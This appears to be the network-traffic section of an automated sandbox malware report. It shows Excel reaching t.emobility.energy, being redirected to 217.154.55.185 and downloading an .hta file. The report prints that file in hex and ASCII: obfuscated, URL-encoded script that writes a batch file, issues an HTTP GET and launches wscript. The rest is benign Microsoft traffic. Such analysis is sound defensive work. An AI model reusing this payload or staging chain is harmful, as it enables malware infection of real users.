                            Mar 24, 2025 09:33:33.725390911 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.725471020 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.733774900 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733793020 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733875990 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.733889103 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.733937025 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.766953945 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.766979933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.767071009 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.767071009 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.767088890 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.767129898 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795046091 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795069933 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795115948 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795118093 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795133114 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795154095 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795192957 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795198917 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795214891 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795242071 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795289040 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795588970 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795588970 CET49701443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:33.795604944 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:33.795613050 CET4434970113.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.606143951 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.606197119 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.606507063 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.606709957 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.606719017 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.607973099 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.608012915 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.608146906 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.608300924 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.608309984 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.899725914 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.899859905 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.900489092 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.900516033 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.900635958 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.900665998 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.901477098 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.901484966 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:37.902105093 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:37.902112007 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.090267897 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.090291023 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.090353012 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.090372086 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.090483904 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.090733051 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.090733051 CET49703443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.090756893 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.090768099 CET4434970313.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.092942953 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.093271971 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.096581936 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.099214077 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.099214077 CET49702443192.168.2.913.107.246.40
                            Mar 24, 2025 09:33:38.099236965 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:33:38.099242926 CET4434970213.107.246.40192.168.2.9
                            Mar 24, 2025 09:34:14.661489964 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:34:15.114818096 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:34:16.004935980 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:34:17.770670891 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:34:21.301888943 CET4970080192.168.2.9217.154.55.185
                            Mar 24, 2025 09:34:28.348764896 CET4970080192.168.2.9217.154.55.185
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 24, 2025 09:33:17.831415892 CET5943353192.168.2.91.1.1.1
                            Mar 24, 2025 09:33:17.958359957 CET53594331.1.1.1192.168.2.9
                            Mar 24, 2025 09:33:31.287343979 CET6226753192.168.2.91.1.1.1
                            Mar 24, 2025 09:33:31.391124964 CET53622671.1.1.1192.168.2.9

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 24, 2025 09:33:17.831415892 CET192.168.2.91.1.1.10xbaf7Standard query (0)t.emobility.energyA (IP address)IN (0x0001)false
                            Mar 24, 2025 09:33:31.287343979 CET192.168.2.91.1.1.10x2500Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 24, 2025 09:32:26.507072926 CET1.1.1.1192.168.2.90xc65aNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:32:26.507072926 CET1.1.1.1192.168.2.90xc65aNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:26.507072926 CET1.1.1.1192.168.2.90xc65aNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)www.download.windowsupdate.com.cdn.dnsv1.commicrosoft-10.ovslegodl.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.182.96A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.175.186.85A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.136.87A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.175.170.196A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.134.210A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.175.186.87A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.183.76A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.136.170A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.183.74A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:32:27.139607906 CET1.1.1.1192.168.2.90x460fNo error (0)microsoft-10.ovslegodl.sched.ovscdns.com43.152.135.101A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:33:17.958359957 CET1.1.1.1192.168.2.90xbaf7No error (0)t.emobility.energyhost1.emobility.energyCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:33:17.958359957 CET1.1.1.1192.168.2.90xbaf7No error (0)host1.emobility.energy162.19.137.157A (IP address)IN (0x0001)false
                            Mar 24, 2025 09:33:31.391124964 CET1.1.1.1192.168.2.90x2500No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:33:31.391124964 CET1.1.1.1192.168.2.90x2500No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:33:31.391124964 CET1.1.1.1192.168.2.90x2500No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:33:31.391124964 CET1.1.1.1192.168.2.90x2500No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 24, 2025 09:33:31.391124964 CET1.1.1.1192.168.2.90x2500No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • t.emobility.energy
                            • otelrules.svc.static.microsoft
                            • ctldl.windowsupdate.com
                            • 217.154.55.185

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.94968743.152.182.96801896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            Mar 24, 2025 09:32:27.248343945 CET287OUTGET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6a8babc50d5d255e HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            If-Modified-Since: Thu, 05 Dec 2024 19:42:09 GMT
                            If-None-Match: "06cfcc54d47db1:0"
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: ctldl.windowsupdate.com
                            Mar 24, 2025 09:32:27.350023985 CET303INHTTP/1.1 304 Not Modified
                            Etag: "06cfcc54d47db1:0"
                            Cache-Control: public,max-age=900
                            Content-Type: application/vnd.ms-cab-compressed
                            Date: Thu, 05 Dec 2024 22:41:48 GMT
                            X-NWS-LOG-UUID: 17436673637204598576
                            Connection: close
                            Server: Lego Server
                            X-Cache-Lookup: Cache Hit
                            X-CID: 15
                            X-CCC: US
                            Mar 24, 2025 09:32:27.407335997 CET1INData Raw: 0d
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination Port
                            1192.168.2.94968943.152.182.9680
                            TimestampBytes transferredDirectionData
                            Mar 24, 2025 09:32:28.575257063 CET196OUTGET /msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?526cae6927517da1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: ctldl.windowsupdate.com
                            Mar 24, 2025 09:32:28.674036980 CET388INHTTP/1.1 200 OK
                            Last-Modified: Fri, 02 Jun 2017 17:39:05 GMT
                            Etag: "80424021c7dbd21:0"
                            Content-Type: application/vnd.ms-cab-compressed
                            Date: Thu, 20 Mar 2025 11:53:34 GMT
                            Cache-Control: public, max-age=900
                            Content-Length: 7796
                            Accept-Ranges: bytes
                            X-NWS-LOG-UUID: 598174241133232527
                            Connection: keep-alive
                            Server: Lego Server
                            X-Cache-Lookup: Cache Hit
                            X-CID: 15
                            X-CCC: US
                            Mar 24, 2025 09:32:28.674077988 CET1254INData Raw: 4d 53 43 46 00 00 00 00 74 1e 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 49 00 00 00 01 00 01 00 98 45 00 00 00 00 00 00 00 00 c2 4a d0 52 20 00 70 69 6e 72 75 6c 65 73 2e 73 74 6c 00 ab 3e 4e 16 23 1e 98 45 43
                            Data Ascii: MSCFt,IEJR pinrules.stl>N#ECK[TOl$)VavdH&DYA,(+YAc]"ka-XWIw|9{|dvTwTMZ|)FrtAmfT*nz:
                            Mar 24, 2025 09:32:28.674209118 CET1254INData Raw: 90 8d 84 87 0b f9 e4 89 1d f7 8b cf 90 3d e9 81 8c e7 11 86 50 41 49 0d 0c af 50 d4 50 5d 0e 4a 4d 33 99 01 11 89 99 0a e6 3e c0 83 74 4a a7 42 92 ad 7a 3b 23 c9 1e 42 21 62 58 20 25 5b a2 38 02 7a 9d 70 dd 56 a1 b8 94 18 c1 c8 29 c7 ab 50 75 d8
                            Data Ascii: =PAIPP]JM3>tJBz;#B!bX %[8zpV)PuWu`0DO*@;twJHazT<9g_W.LQo+V (I;*Qq(8(9C4FBRX%SmIXL,eC%B&.
                            Mar 24, 2025 09:32:28.674576044 CET1254INData Raw: df f8 f8 b7 da f6 9b e6 3a ac 6d c8 5e df dc 73 27 0d b4 b4 98 a7 b6 0b ca c2 36 b9 5e d3 d9 38 23 77 16 c0 64 54 bf 7d 7a b7 d8 70 b0 a9 e6 90 71 b5 eb 37 e4 95 c8 fe dc b4 45 e2 c3 df 06 0d 7a 3d c4 44 8b 18 83 56 9b 06 ca 97 fc 32 25 cb 7a 5f
                            Data Ascii: :m^s'6^8#wdT}zpq7Ez=DV2%z_-&SZSI2-q<}tlzp#Lc7c5=S~Q>N7p4cwM+V2<B%@)?O4i')SzFXg*Fx1FMc`K@-hMNh?
                            Mar 24, 2025 09:32:28.674591064 CET1254INData Raw: 62 d2 f3 3f e7 cf df 48 bd 5f 78 37 23 13 76 d6 7e e8 2d 3a 3d 66 40 d9 e5 e2 89 4e 1b 1a 3e ae 1f 13 34 e2 51 d3 d9 a4 d0 c9 b6 9c a0 49 37 36 4d 1c 9b d4 7b 15 dd ba fa 49 d6 c0 92 22 d3 99 91 7a da 35 bd a7 3b 73 7e 2e a0 03 a9 b5 55 fe ab 2f
                            Data Ascii: b?H_x7#v~-:=f@N>4QI76M{I"z5;s~.U/5]:_pPsD<~&w}T;jlE8NsgRht*<aq5#_-|K3/$*d)KNnoIuN1.KuiwG//:d
                            Mar 24, 2025 09:32:28.674644947 CET1254INData Raw: 90 22 5d ba 20 75 41 10 90 17 70 75 d9 75 7d 6f 77 66 77 66 df 3f 77 ee 39 73 e7 fc f1 cd f7 9d df f7 3b 77 4e 83 20 51 5c bc e5 98 f5 4c 80 fd 79 90 57 96 1e 9f db e4 28 7d e6 a1 0f 27 35 b4 f9 38 ca 14 75 c2 d3 e2 9f 31 af 1c e5 c7 0f 64 4b b7
                            Data Ascii: "] uApuu}owfwf?w9s;wN Q\LyW(}'58u1dK/6;4r!nvjZvEb,i^X)sHYK(bu:w=gU/c>xID/ \qAjSqAhNCa_? `|Tcy
                            Mar 24, 2025 09:32:28.674658060 CET1254INData Raw: c4 8a 63 d1 5b 37 8b 51 98 ed a1 24 b0 35 fc 47 60 8c 08 fa 96 05 a0 2d 16 80 a8 2c a0 d6 5d d5 8f 97 af 6e e8 c0 f3 5a 67 89 98 f9 93 74 a9 0f 15 9d c2 91 0c 6a 4d 94 72 ff dd 5a ba 68 6e 51 ef 3e 57 bf b0 17 91 eb 32 74 4d c7 c5 02 b0 11 32 87
                            Data Ascii: c[7Q$5G`-,]nZgtjMrZhnQ>W2tM2,Nq)wS+l;ga*/4.AdTl,SF1$e\2q^0J/Z|KiwVUd;Wpf}nCvuSj&/ko:<a>_
                            Mar 24, 2025 09:32:28.674665928 CET272INData Raw: 86 0d 1d e9 49 f3 8e 15 7f 91 e7 9b d7 df 68 68 6c e7 58 4d f0 0d fc 74 f9 aa 6d e5 c2 9e 16 3a 99 6b f0 61 59 64 68 1a 3c 5f ad 14 9e 19 6c 35 f9 42 dd 27 d4 65 1d 9a c0 60 7a 63 5f 11 ef 84 30 45 2f e7 1e 69 ea bc cd e6 75 3a 7a 59 b8 da b0 fb
                            Data Ascii: IhhlXMtm:kaYdh<_l5B'e`zc_0E/iu:zY'Fq\B1uol:^0*uBOB,u\r\krBLpn!%#-|Y+`u{ |N7cnb"yH-na.S^:A6g
                            Mar 24, 2025 09:32:28.727093935 CET1INData Raw: 7f
                            Data Ascii:
                            Mar 24, 2025 09:32:28.776071072 CET1INData Raw: 72
                            Data Ascii: r


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.949700217.154.55.185801896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            Mar 24, 2025 09:33:18.919820070 CET267OUTGET /xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 217.154.55.185
                            Mar 24, 2025 09:33:19.090862989 CET1254INHTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:19 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                            Last-Modified: Mon, 24 Mar 2025 07:00:12 GMT
                            ETag: "1654-6311127d429d6"
                            Accept-Ranges: bytes
                            Content-Length: 5716
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/hta
                            Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 39 30 64 6e 73 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 30 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 34 35 25 37 38 25 36 35 25 36 33 25 37 35 25 37 34 25 36 31 25 37 32 25 32 30 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 34 38 25 35 [TRUNCATED]
                            Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by http://www.n90dns.com -->...document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%45%78%65%63%75%74%61%72%20%53%63%72%69%70%74%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%48%54%41%3A%41%50%50%4C%49%43%41%54%49%4F%4E%20%0A%20%20%20%20%20%20%20%20%41%50%50%4C%49%43%41%54%49%4F%4E%4E%41%4D%45%3D%22%53%63%72%69%70%74%45%78%65%63%75%74%6F%72%22%0A%20%20%20%20%20%20%20%20%42%4F%52%44%45%52%3D%22%6E%6F%6E%65%22%0A%20%20%20%20%20%20%20%20%43%41%50%54%49%4F%4E%3D%22%6E%6F%22%0A%20%20%20%20%20%20%20%20%53%48%4F%57%49%4E%54%41%53%4B%42%41%52%3D%22%6E%6F%22%0A%20%20%20%20%20%20%20%20%53%49%4E%47%4C%45%49%4E%53%54%41%4E%43%45%3D%22%79%65%73%22%0A%20%20%20%20%20%20%20%20%57%49%4E%44%4F%57%53%54%41%54%45%3D%22%6D%69%6E%69%6D%69%7A%65%22%0A%20%20%20%20%2F%3E%0A%20%20%20%20%3C%73%
                            Mar 24, 2025 09:33:19.090887070 CET1254INData Raw: 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 32 25 35 36 25 34 32 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 32
                            Data Ascii: 63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%44%69%6D%20%70%61%70%75%6C%6F%73%65%0A%20%20%20%20%20%20%20%20%53%65%74%20%70%61%70%75%6C%6F%73%65%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%
                            Mar 24, 2025 09:33:19.090900898 CET1254INData Raw: 37 33 25 37 30 25 37 34 25 37 34 25 36 38 25 32 32 25 32 30 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 36
                            Data Ascii: 73%70%74%74%68%22%20%20%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%73%61%67%67%69%65%72%2E%57%72%69%74%65%4C%69%6E%65%20%22%40%65%63%68%6F%20%6F%66%66%22%0A%20%20%20%20%20%20%20%20%73%61%67%67%69%65%72%2E%57%72%69%74%65%4C%69%6E%65%
                            Mar 24, 2025 09:33:19.090913057 CET1254INData Raw: 32 35 25 36 36 25 37 35 25 36 37 25 37 35 25 36 35 25 37 33 25 32 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 33 25 36 31 25 36 37 25 36 37 25 36 39 25 36 35 25 37 32 25 32 45 25 35 37 25 37
                            Data Ascii: 25%66%75%67%75%65%73%25%22%0A%20%20%20%20%20%20%20%20%73%61%67%67%69%65%72%2E%57%72%69%74%65%4C%69%6E%65%20%22%65%63%68%6F%20%64%6F%63%75%6D%65%6E%74%61%72%69%73%74%2E%6F%70%65%6E%20%22%22%47%45%54%22%22%2C%20%6E%6F%6E%63%61%74%61%6C%6F%67%2C%
                            Mar 24, 2025 09:33:19.090928078 CET1017INData Raw: 37 34 25 32 30 25 32 32 25 32 32 25 32 32 25 32 32 25 32 30 25 32 46 25 36 32 25 32 30 25 37 37 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 32 46 25 32 46 25 36 45 25 36 46 25 36 43 25 36 46 25 36 37 25 36 46 25 32 30 25 32
                            Data Ascii: 74%20%22%22%22%22%20%2F%62%20%77%73%63%72%69%70%74%20%2F%2F%6E%6F%6C%6F%67%6F%20%22%22%25%66%75%67%75%65%73%25%22%22%22%0A%20%20%20%20%20%20%20%20%73%61%67%67%69%65%72%2E%57%72%69%74%65%4C%69%6E%65%20%22%74%69%6D%65%6F%75%74%20%2F%74%20%31%20%


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.949699162.19.137.1574431896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-24 08:33:18 UTC226OUTGET /3yRDYq?&balance=tested&cleaner HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: t.emobility.energy
                            Connection: Keep-Alive
                            2025-03-24 08:33:18 UTC621INHTTP/1.1 302 Found
                            Date: Mon, 24 Mar 2025 08:33:18 GMT
                            Server: Apache/2.4.62 (Debian)
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://217.154.55.185/xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid
                            Vary: Accept
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 119
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                            Connection: close
                            2025-03-24 08:33:18 UTC119INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 31 37 2e 31 35 34 2e 35 35 2e 31 38 35 2f 78 61 6d 70 70 2f 6b 69 73 73 2f 7a 79 6e 65 77 64 61 79 73 6e 65 77 74 69 6d 65 66 6f 72 62 65 73 74 74 68 69 6e 67 73 74 6f 68 61 70 70 65 6e 65 64 65 76 65 72 2e 68 74 61 3f 26 61 64 76 61 6e 74 61 67 65 3d 73 6f 6c 69 64
                            Data Ascii: Found. Redirecting to http://217.154.55.185/xampp/kiss/zynewdaysnewtimeforbestthingstohappenedever.hta?&advantage=solid


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.94970113.107.246.404431896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-24 08:33:31 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:32 UTC500INHTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:31 GMT
                            Content-Type: text/plain
                            Content-Length: 1114783
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Last-Modified: Sat, 22 Mar 2025 04:56:33 GMT
                            ETag: "0x8DD68FDEB406397"
                            x-ms-request-id: 1e99e20f-501e-005b-7c62-9cd7f7000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083331Z-17cccd5449bmwjbphC1EWRnfmw000000053g000000004aer
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T2
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:32 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                            Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
